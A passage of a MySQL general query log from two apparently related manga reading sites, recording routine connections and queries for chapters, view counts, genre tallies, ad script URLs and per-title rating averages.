'%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Martial Arts%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330643293 Quit 330643294 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643295 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643294 Quit 330643295 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643295 Quit 330643296 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643297 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643297 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643296 Quit 330643297 Quit 330643298 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643299 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643298 Quit 330643299 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643299 Quit 330643300 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643301 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643301 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643300 Quit 330643301 Quit 330643302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643302 Quit 330643303 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17959' 330643303 Quit 330643304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643304 Query select * FROM chapters where id = '17959' 330643304 Quit 330643305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643305 Query select * FROM chapters where manga_id = '104' order by id desc 330643305 Quit 330643306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643306 Query Update chapters set view=view+1 where id = '17959' 330643306 Quit 330643307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643307 Query select * FROM chapters where id = '17959' 330643307 Quit 330643308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643308 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17959' 330643308 Quit 330643309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643309 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('104', '17959', '193.3.41.125', 'mangacherri.com', '2026-02-26 03:28:23', '2026-02-26 03:28:23') 330643309 Quit 330643310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643310 Query select * FROM chapter_images where chapter_id = '17959' 330643310 Quit 330643311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643311 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '104' and m.active = 1 330643311 Quit 330643312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643312 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='104' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 260225 19:28:24 330643313 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643314 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643313 Quit 330643314 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '346' and m.active = 1 330643314 Quit 330643315 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643315 Query select * FROM chapters where id = '346' 330643315 Quit 330643316 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643316 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330643316 Quit 330643317 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643317 Query Update chapters set view=view+1 where id = '346' 330643317 Quit 330643318 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643318 Query select * FROM chapters where id = '346' 330643318 Quit 330643319 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643319 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '346' and m.active = 1 330643319 Quit 330643320 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643320 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '346', '107.77.206.202', 'mangaberri.com', '2026-02-26 03:28:24', '2026-02-26 03:28:24') 330643320 Quit 330643321 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643321 Query select * FROM chapter_images where chapter_id = '346' 330643321 Quit 330643322 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643322 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330643322 Quit 330643323 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643323 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330643323 Quit 330643324 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643325 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643324 Quit 330643325 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643325 Quit 330643326 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643327 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643326 Quit 330643327 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643327 Quit 330643328 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643329 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643328 Quit 330643329 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643329 Quit 330643330 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643331 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330643330 Quit 330643331 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643331 Quit 330643312 Quit 330643332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643332 Quit 330643333 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643333 Quit 330643334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643335 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643335 Quit 330643334 Quit 330643336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643336 Quit 330643337 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643337 Quit 330643338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643338 Quit 330643339 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330643339 Quit 330643340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643340 Quit 330643341 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'first-love-maze' 330643341 Quit 330643342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643342 Query select * FROM chapters where manga_id = '384' order by id desc 330643342 Quit 330643343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643343 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '384' and m.active = 1 330643343 Quit 330643344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643344 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='384' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 260225 19:28:25 330643344 Quit 330643345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643345 Query select * FROM comments where manga_id = '384' and parent_id is null order by created desc 330643345 Quit 330643346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643346 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '384' and m.active = 1 330643346 Quit 330643347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643347 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Comedy%' OR m.genres like '%Romance%' OR m.genres like '%School%' OR m.genres like '%Shoujo%') group by manga_id ORDER BY sum(view) DESC 330643347 Quit 330643348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643348 Quit 330643349 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330643349 Quit 330643350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330643350 Quit 330643351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643351 Query select * FROM chapters where manga_id = '384' order by created desc limit 1 330643351 Quit 330643352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330643352 Quit 330643353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330643353 Quit 330643354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330643354 Quit 330643355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330643355 Quit 330643356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330643356 Quit 330643357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330643357 Quit 330643358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330643358 Quit 330643359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330643359 Quit 330643360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643360 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330643360 Quit 330643361 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643361 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330643361 Quit 330643362 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643362 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330643362 Quit 330643363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643363 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330643363 Quit 330643364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643364 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330643364 Quit 330643365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643365 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330643365 Quit 330643366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643366 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330643366 Quit 330643367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643367 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330643367 Quit 330643368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643368 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330643368 Quit 330643369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643369 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330643369 Quit 330643370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643370 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330643370 Quit 330643371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643371 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330643371 Quit 330643372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643372 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330643372 Quit 330643373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643373 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330643373 Quit 330643374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643374 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330643374 Quit 330643375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643375 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330643375 Quit 330643376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643376 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330643376 Quit 330643377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643377 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330643377 Quit 330643378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643378 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330643378 Quit 330643379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643379 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330643379 Quit 330643380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643380 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330643380 Quit 330643381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643381 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330643381 Quit 330643382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643382 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330643382 Quit 330643383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643383 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330643383 Quit 330643384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643384 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330643384 Quit 330643385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643385 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330643385 Quit 330643386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643386 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330643386 Quit 330643387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643387 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330643387 Quit 330643388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643388 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330643388 Quit 330643389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643389 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330643389 Quit 330643390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643390 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330643390 Quit 330643391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643391 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330643391 Quit 330643392 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643392 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330643392 Quit 330643393 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643393 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330643393 Quit 330643394 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643394 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330643394 Quit 330643395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330643395 Quit 330643396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330643396 Quit 330643397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330643397 Quit 330643398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330643398 Quit 330643399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330643399 Quit 330643400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330643400 Quit 330643401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330643401 Quit 330643402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330643402 Quit 330643403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330643403 Quit 330643404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330643404 Quit 330643405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330643405 Quit 330643406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330643406 Quit 330643407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330643407 Quit 330643408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330643408 Quit 330643409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330643409 Quit 330643410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330643410 Quit 330643411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330643411 Quit 330643412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330643412 Quit 330643413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330643413 Quit 330643414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330643414 Quit 330643415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330643415 Quit 330643416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330643416 Quit 330643417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330643417 Quit 330643418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330643418 Quit 330643419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330643419 Quit 330643420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330643420 Quit 330643421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330643421 Quit 330643422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330643422 Quit 330643423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330643423 Quit 330643424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330643424 Quit 330643425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330643425 Quit 330643426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330643426 Quit 330643427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330643427 Quit 330643428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330643428 Quit 330643429 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330643429 Quit 330643430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330643430 Quit 330643431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330643431 Quit 330643432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330643432 Quit 330643433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330643433 Quit 330643434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330643434 Quit 330643435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330643435 Quit 330643436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330643436 Quit 330643437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330643437 Quit 330643438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330643438 Quit 330643439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330643439 Quit 330643440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330643440 Quit 330643441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330643441 Quit 330643442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330643442 Quit 330643443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330643443 Quit 330643444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330643444 Quit 330643445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330643445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by 